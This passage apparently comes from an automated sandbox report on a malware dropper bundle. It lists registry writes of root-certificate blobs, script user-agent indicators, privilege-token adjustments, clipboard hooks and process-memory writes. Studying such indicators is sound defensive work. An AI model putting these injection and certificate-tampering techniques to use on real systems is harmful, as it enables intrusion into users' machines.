b3e013cb18d00b13c8d0098a03901b4398d00139d8e0098a03901149a8e008b058e00dce13c018c028e00d7598e0050683901e46a8e00c8478f0044044101c8478f0007979000201d3c0108989000ba2a900080c04101bc2c9000fc6c900050683901fc6c900006949200a4e44101089a920074e692006c573a0174e69200ca589200dce13c01cc5e9200d4479300acec4101f467930080149400bcfc4101801494001184950004464301148195001c8b9700286940011c8b970021b998004809400124bc980040d999004809400140d99900b2289a0068294001b42e9a00a03b9b00e0a04101a03b9b00811f9e0010514001900e9e003b9fa40090d140013c98a400d571a400dce13c01e044a40063c6a500744f3a0164c1a500cd68a5009cdd4001d075a500298fa60084bd38012c8aa6009137a600c08140019432a6004deaa700dce13c0150f7a70077dfa800c88940018028a800f058a800e8a94001f058a80010b9a900fcbd400110b9a900a60fa900f0b14001a801a90019b3aa000c4e43011cb6aa00bd17aa0004464301c06aaa007ad1ab00744f3a01c06bab00fb50ab00387a4301fc57ab001cb0ac0098a03901309cac0040ecac0030724301802cac00a70bac00387a4301a804ac00ae01af0040024301b01faf00de71af0098a03901e04faf00fd52af005068390100b0b0007cccb000541643017cccb0009b2bb000506839019c2cb000ad1db00098a0390110a1b1005decb1007c3e43019021b100ad1cb10098a03901b001b10009bbb200a0e243012092b20071c3b200a8ea43019022b200c573b600b0f24301e056b600a710b700b8fa4301c077b700c275b70008323b01d067b700e750b700142f3a01e750b70003bbb800142f3a0103bbb8003981b800744d38013981b80051e9b800c4fd380151e9b8006cd4b800142f3a016cd4b800853db800142f3a01853db8009f27b800142f3a019f27b800bc04b800142f3a01bc04b800d56db800142f3a01d56db800eb53b800142f3a01eb53b8000fb6b900142f3a010fb6b9002891b900142f3a012891b90041f8b900142f3a0141f8b9005be2b900142f3a015be2b90074cdb900142f3a0174cdb9008d34b900142f3a018d34b900a41db900142f3a01a41db900bc05b900142f3a01bc05b900d66fb900142f3a01d66fb90002b8ba00142f3a0110aaba00308aba00142f3a010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c0ab6b0098df4700bcfb4700c0ab6b0028604800c0ab6b007c1b6700c0ab6b0098f36b00b4db6f0078176f00c89850008cdc50002068480084e96d0068056d0050015100ecbc5000c0ab6b00c0ab6b004413570084d25600cc8b470084c3470094d94d00d48e5a00189c8400e09676000078780080f878008028a800fc57ab0036360000474700004a4a00000b0b0000595900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101181800001818008080000000000000000000000000000101020200003030008080000000000000000000000000000101090d04004848000060f091017d7c0100000000000000000000000000000000003c034715014c561317011a0601531a161f1e1707450b0d0c0b0d07095a1a7201126b151f075307150f0a050d03010b581a5e1c165418013307365d120016080f0e1559581501021d4e1a52071c5449100b0d080c125e40040a111d1c1c0912594e0c02575b121e43584716074d0c0f070f031607223317011a0601531a161f1e171933072a001c48060706073d2708094f581501021d4e1f57071c5449100b0d080c125e40040a111d1c1c0912594e0c02575b121e435845111c33072a0000001c4f160616071b1d0d4733072a00000000001c4e171404101607110134221b1f1f05090202164d33072a000000000000001c4e1714041016071101213d1d0616011d060122291313094c4c09131309511a46123a271819040e175507551c2822000616004e1a41070d1f1642070f1133072a00000000001c135d171404101607110134221b1f1f05090202164d33072a0000001c135c160616071b1d0d4733072a001c135b060706073d27080951330736134e120016080f0e154733070a0000000000000000000000000000000000000000000000000000000000000000000000c0c0002425010078da222202020a0a12126a6a72727a7aaaabb3b3bbbb83838b8b9393d3d4dcdc24242c2c34343c3c04040c0c14141c1c64646c6c74747c7c44444c4c54545c5ca4a5adadb5b5bdbd85858d8d95959d9de5e5ededf5f5fdfdc5c5cdcdd5d5dddd25252d2d35353d3d05050d0d15151d1d65656d6d75757d7d45454d4d55555d5da5a6aeaeb6b6bebe86868e8e96969e9ee6e6eeeef6f6fefec6c6ceced6d6dede26262e2e36363e3e06060e0e16161e1e66666e6e76767e7e46464e4e56565e5ea6a7afafb7b7bfbf87878f8f97979f9fe7e7efeff7f7ffffc7c7cfcfd7d7dfdf27272f2f575eaeafbfbfb7b78f8f87879f9f9797efefe7e7f7f7cfcfc7c7dfdfd7d72f2f27273f3f070717176f6f67677f7f77774f4f47475f5f5757afd0d000e0e0000000a0a8a8b0b0b8b88080888890909898e0e0e8e8f0f0f8f8c0c0c8c8d0d0d8d8585ea6a7afafb7b7c7c7cfcfd7d7dfdf27272f2f37373f3f07070f0f17171f1f67676f6f77777f7f47474f4f57575f5fa7a8a0a0b8b8b0b08888808098989090e8e8e0e0f8f8f0f0c8c8c0c0d8d8d0d0282820203838303008080000181868686060787870704848404058585050a8a9a1a1b9b9b1b18989818199999191e9e9e1e1f9f9f1f1c9c9c1c1d9d9d1d12929212139393131090901011919111169696161797971714949414159595151a9aaa2a2babab2b2aa0000e0e0008c8d0100e84b5b5babacbcbc8c8c9c9cececfcfcccccdcdc2c2c3c3c0c0c1c1c6c6c7c7c4c4c5c5cacadbdbd8d8d9d9dededfdfdcdcddddd2d2d3d3d0d0d1d1d6d6d7d7d4d4d5d5dadaebebe8e8e9e9eeeeefefececedede2e2e3e3e0e0e1e1e6e6e7e7e4e4e5e5eaeafbfbf8f8f9f9fefefffffcfcfdfdf2f2f3f3f0f0f1f1f6f6f7f7f4f4f5f5fafa0b0b080809090e0e0f0f0c0c0d0d020203030000010106060707040405050a0a1b1b181819191e1e1f1f1c1c1d1d121213131010111116161717141415151a1a2b2b282829292e2e2f2f2c2c2d2d222223232020212126262727242425252a2a3b3b383839393e3e3f3f3c3c3d3d323233333030313136363737343435353a3a4b4b484849494e4e4f4f4c4c4d4d424243434040414146464747444445454a4a5b5b585859595e5e5f5f5c5c5d5d525253535050515156565757545455555a5a6b6b686869696e6e6f6f6c6c6d6d626263636060616166666767646465656a6a7b7b787879797e7e7f7f7c7c7d7d727273737070717176767777747475757aff0f0008484000008a8b8b888889898e8e8f8f8c8c8d8d828283838080818186868787848485858a8a9b9b989899999e9e9f9f9c9c9d9d929293939090919196969797949495959a9aababae2eefefececedede2e2e3e3e0e0e1e1e6e6e7e7e4e4e5e5eaeafbfbf8f8f9f9fefefffffcfcfdfdf2f2f3f3f0f0f1f1f6f6f7f7f4f4f5f5faf0001019899010000a0b0b080809090e0e0f0f0c0c0d0d020203030000010106060707040405050a0a1b1b181819191e1e1f1f1c1c1d1d121213131010111116161717141415151a1a2b2b282829292e2e2f2f2c2c2d2d222223232020212126262727242425252a2a3b3b383839393e3e3f3f3c3c3d3d323233333030313136363737343435353a3a4b4b484849494e4e4f4f4c4c4d4d424243434040414146464747444445454a4a5b5b585859595e5e5f5f5c5c5d5d525253535050515156565757545455555a5a6b6b686869696e6e6f6f6c6c6d6d626263636060616166666767646465656a6a7b7b787879797e7e7f7f7c7c7d7d727273737070717176767777747475757a7a8b8b888889898e8e8f8f8c8c8d8d828283838080818186868787848485858a8a9b9b989899999e9e9f9f9c9c9d9d929293939090919196969797949495959a9aababa8a8a9a9aeaeafafacacadada2a2a3a3a0a0a1a1a6a6a7a7a4a4a5a5aaaabbbbb8b8b9b9bebebfbfbcbcbdbdb2b2b3b3b0b0b1b1b6b6b7b7b4b4b5b5babacbcbc8c8c9c9cececfcfcccccdcdcac3031011010000048edc5c5cdcda500005051014848000078da32357d7d5d5dbdbe9e9efefe2e2e06060e0e16164e4e5656b6b8b0b08888808098989090e8e8e0e0f8f8f0f0c0c0d8d8d0d028282020383830300808a8000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag\TargetKnownFolder = "{a52bba46-e9e1-435f-b3d9-28daa648c0f6}" FileSyncConfig.exe -
Processes:
installer.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 26 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 399 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 489 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Mon204014f13870f5e.exemsiexec.exeDYbALA.exepid process 1444 Mon204014f13870f5e.exe 1444 Mon204014f13870f5e.exe 1640 msiexec.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe 2708 DYbALA.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
foldershare.exepid process 1584 6768 foldershare.exe -
Suspicious behavior: MapViewOfSection 22 IoCs
Processes:
Mon204014f13870f5e.exeYQuyJEBXZ9noq8wFtxIcifjm.exe0hsYE0Ua39VMSSKkhNqNhUpL.exeMicrosoftEdgeCP.exejhbafrfjhbafrfjhbafrfpid process 1444 Mon204014f13870f5e.exe 5264 YQuyJEBXZ9noq8wFtxIcifjm.exe 7488 0hsYE0Ua39VMSSKkhNqNhUpL.exe 5164 MicrosoftEdgeCP.exe 5164 MicrosoftEdgeCP.exe 5164 MicrosoftEdgeCP.exe 5164 MicrosoftEdgeCP.exe 5164 MicrosoftEdgeCP.exe 5164 MicrosoftEdgeCP.exe 14836 jhbafrf 5164 MicrosoftEdgeCP.exe 5164 MicrosoftEdgeCP.exe 5164 MicrosoftEdgeCP.exe 5164 MicrosoftEdgeCP.exe 14172 jhbafrf 5164 MicrosoftEdgeCP.exe 5164 MicrosoftEdgeCP.exe 5164 MicrosoftEdgeCP.exe 5164 MicrosoftEdgeCP.exe 5164 MicrosoftEdgeCP.exe 5164 MicrosoftEdgeCP.exe 10396 jhbafrf -
Suspicious behavior: SetClipboardViewer 3 IoCs
Processes:
6507952.scr4415613.scr8633772.scrpid process 4248 6507952.scr 6188 4415613.scr 5276 8633772.scr -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Mon209b3da1556b9a317.exeMon206d48916f93c5.exemsiexec.exePp65i0I9Y1K24s5W4LIQd_5I.exe4.exeDownFlSetup110.exeWerFault.exe3877687.scr5221391.scrrundll32.exesvchost.exedescription pid process Token: SeDebugPrivilege 2152 Mon209b3da1556b9a317.exe Token: SeDebugPrivilege 2944 Mon206d48916f93c5.exe Token: SeDebugPrivilege 1640 msiexec.exe Token: SeDebugPrivilege 2788 Pp65i0I9Y1K24s5W4LIQd_5I.exe Token: SeDebugPrivilege 4108 4.exe Token: SeDebugPrivilege 2956 DownFlSetup110.exe Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeRestorePrivilege 4944 WerFault.exe Token: SeBackupPrivilege 4944 WerFault.exe Token: SeDebugPrivilege 4052 3877687.scr Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeDebugPrivilege 4236 5221391.scr Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeDebugPrivilege 4944 WerFault.exe Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeDebugPrivilege 1784 rundll32.exe Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeShutdownPrivilege 1584 Token: SeCreatePagefilePrivilege 1584 Token: SeDebugPrivilege 1784 rundll32.exe Token: SeDebugPrivilege 3916 svchost.exe -
Suspicious use of FindShellTrayWindow 16 IoCs
Processes:
setup.tmpinstaller.exepid process 3548 setup.tmp 14452 installer.exe 1584 1584 1584 1584 1584 1584 1584 1584 1584 1584 1584 1584 1584 1584 -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exepid process 1584 14524 MicrosoftEdge.exe 5164 MicrosoftEdgeCP.exe 5164 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3816 wrote to memory of 1564 3816 setup_x86_x64_install.exe setup_installer.exe PID 3816 wrote to memory of 1564 3816 setup_x86_x64_install.exe setup_installer.exe PID 3816 wrote to memory of 1564 3816 setup_x86_x64_install.exe setup_installer.exe PID 1564 wrote to memory of 2368 1564 setup_installer.exe setup_install.exe PID 1564 wrote to memory of 2368 1564 setup_installer.exe setup_install.exe PID 1564 wrote to memory of 2368 1564 setup_installer.exe setup_install.exe PID 2368 wrote to memory of 3880 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 3880 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 3880 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 516 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 516 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 516 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 408 2368 setup_install.exe cmd.exe PID 2368 wrote to memory of 408 2368 setup_install.exe 